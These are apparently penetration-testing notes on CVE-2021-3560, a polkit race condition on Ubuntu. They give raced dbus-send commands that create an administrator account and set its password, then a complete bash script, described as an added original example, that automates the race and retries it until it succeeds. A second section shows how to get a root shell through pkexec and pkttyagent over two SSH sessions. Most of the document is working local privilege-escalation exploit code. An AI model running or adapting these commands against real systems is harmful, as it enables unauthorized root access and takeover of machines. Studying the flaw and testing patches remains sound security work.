# CVE-2021-3560
* Affects polkit `< 0.105-26ubuntu1.1` (Ubuntu package version; check the installed version with `dpkg -l policykit-1`)
## Race Condition
* Request creation of an account by sending a D-Bus message to `accounts-daemon`, then kill the sending `dbus-send` process before polkit has finished its authorization check. The sleep time that wins the race varies between systems (roughly half the time an ordinary `dbus-send` call takes), so the command usually has to be repeated.
```sh
# Background the CreateUser call, then kill the sender ~5 ms later,
# before polkit has finished working out who sent it
dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:user1 string:"New Account" int32:1 & sleep 0.005s; kill $!
```
* Generate a SHA-512 crypt hash of the new password (`password123` here) with `openssl passwd -6 -salt salt password123`, then set it with a second raced call. The object path `/org/freedesktop/Accounts/User1000` has to match the uid the new account actually received (check with `id user1`).
```sh
# Same race against SetPassword; User1000 must be the uid of the account created above
dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1000 org.freedesktop.Accounts.User.SetPassword string:'$6$salt$cevuzTZ/QBjzuZG0/ebEeedmcTnhyM8ITUu8K032Cp2XvIibq7voqYagm18bwpLBqrg/l/l6YxTmKKibJz5r10' string:'New Password' & sleep 0.005s; kill $!
```
* The sender is killed after polkit has received the authorization request but before it has finished checking it
* Polkit then asks for the uid of the process that sent the message, but that process no longer exists
* The lookup fails with an error
* Polkit does not handle the error correctly and continues with uid 0 (root) as the requester
* The request is authorized and `accounts-daemon` carries it out
* `int32:1` makes the new account an administrator, i.e. a member of group `sudo`, so `su user1` followed by `sudo -s` gives a root shell
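The steps above automated as one script. This is an added example and not part of the original notes or of any public exploit; it assumes an unpatched polkit (`< 0.105-26ubuntu1.1` on Ubuntu), a running `accounts-daemon`, and the `dbus-send` and `openssl` binaries. The user name, password, salt and the rule of thumb "kill after half the duration of a normal call" are assumptions carried over from the manual steps.

```shell
#!/usr/bin/env bash
# Added example, not from the original notes: automates the CVE-2021-3560 race.
# Assumes an unpatched polkit (< 0.105-26ubuntu1.1 on Ubuntu), a running
# accounts-daemon, and dbus-send/openssl. USER_NAME, PASS and SALT mirror the
# manual steps and are assumptions; override them via the environment.
USER_NAME="${USER_NAME:-user1}"
PASS="${PASS:-password123}"
SALT="${SALT:-salt}"

# Turn a measured call duration in nanoseconds into the kill delay for
# sleep(1): half the measured time, as seconds with six decimals. Pure
# arithmetic, so it can be checked without D-Bus.
delay_from_ns() {
    local half_us=$(( $1 / 2000 ))           # ns -> us, then halve
    printf '%d.%06d\n' $(( half_us / 1000000 )) $(( half_us % 1000000 ))
}

# Time one ordinary (unraced) CreateUser call. As an unprivileged user it is
# denied, but its wall-clock time is what the race window is derived from.
measure_call_ns() {
    local start end
    start=$(date +%s%N)
    dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply \
        /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser \
        string:"$USER_NAME" string:"New Account" int32:1 >/dev/null 2>&1 || true
    end=$(date +%s%N)
    echo $(( end - start ))
}

# Fire a D-Bus method call and kill the sender after $1 seconds, so polkit's
# lookup of the caller's uid fails mid-check (the bug: that failure -> uid 0).
raced_call() {
    local delay="$1"; shift
    dbus-send --system --dest=org.freedesktop.Accounts --type=method_call \
        --print-reply "$@" >/dev/null 2>&1 &
    sleep "$delay"
    kill "$!" 2>/dev/null || true
}

# The race is probabilistic: repeat CreateUser until `id` sees the account.
create_user() {
    local delay="$1" tries=0
    while ! id "$USER_NAME" >/dev/null 2>&1 && [ "$tries" -lt 50 ]; do
        raced_call "$delay" /org/freedesktop/Accounts \
            org.freedesktop.Accounts.CreateUser \
            string:"$USER_NAME" string:"New Account" int32:1
        tries=$(( tries + 1 ))
    done
    id "$USER_NAME" >/dev/null 2>&1
}

# Set the new user's password with the same race; the object path must use
# the uid that was actually allocated, not a hard-coded User1000.
set_password() {
    local delay="$1" uid hash
    uid=$(id -u "$USER_NAME")
    hash=$(openssl passwd -6 -salt "$SALT" "$PASS")
    raced_call "$delay" "/org/freedesktop/Accounts/User$uid" \
        org.freedesktop.Accounts.User.SetPassword \
        "string:$hash" string:"New Password"
}

main() {
    local ns delay
    ns=$(measure_call_ns)
    delay=$(delay_from_ns "$ns")
    echo "[*] one call took ${ns} ns; killing the sender after ${delay}s"
    create_user "$delay" || { echo "[-] CreateUser never won the race" >&2; return 1; }
    set_password "$delay"
    echo "[+] now: su $USER_NAME (password: $PASS), then sudo -s"
}

# Only run the attack when explicitly asked: ./race.sh run
if [ "${1:-}" = "run" ]; then main; fi
```

Run it as `./race.sh run`. `SetPassword` is also raced, so it is not verified by the script; if `su user1` rejects the password, rerun with a slightly different delay (set `USER_NAME` to the already created account so `create_user` is skipped).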
# Priv Esc with Two Sessions
* The user must already be a member of group `sudo`. This is a way to authenticate to `pkexec` from a plain terminal (e.g. over SSH) when its own password prompt fails; `pkttyagent` in a second session acts as the polkit authentication agent.
* Open two ssh sessions
* In session one check the PID
```sh
echo $$
```
* In session two, attach a text-mode polkit agent to the shell process of session one
```sh
pkttyagent --process <PID of s1>
```
* In session one, run
```sh
pkexec "/bin/bash"
```
* The password prompt appears in session two; enter the user's own password there and session one gets a root shell